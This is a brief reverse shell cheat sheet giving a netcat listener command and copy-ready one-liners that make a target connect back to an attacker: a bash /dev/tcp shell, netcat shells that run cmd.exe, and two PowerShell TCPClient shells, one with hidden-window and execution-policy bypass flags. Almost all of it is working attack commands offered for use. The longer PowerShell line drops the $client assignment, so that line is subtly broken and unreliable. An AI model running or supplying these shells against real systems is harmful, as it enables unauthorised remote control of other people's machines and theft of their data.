Reverse Shell Cheatsheet
A reverse shell allows an attacker to gain shell access to a target machine by making the target connect back to the attacker's listener. Below are common reverse shell commands for Linux and Windows.
Attacker's Machine (Listener)
Start a listener to wait for incoming connections:
nc -nvlp {port}
Linux Reverse Shell (Target)
On the target machine, connect back to the attacker's listener:
bash -i >& /dev/tcp/{ip}/{port} 0>&1
Windows Reverse Shell (Target)
- Using netcat:
nc.exe -nv 192.168.119.1 443 -e cmd.exe
\\192.168.119.1\a\bin\nc.exe -nv 192.168.119.1 443 -e cmd.exe
- Using PowerShell (full):
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.119.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Using PowerShell (short):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"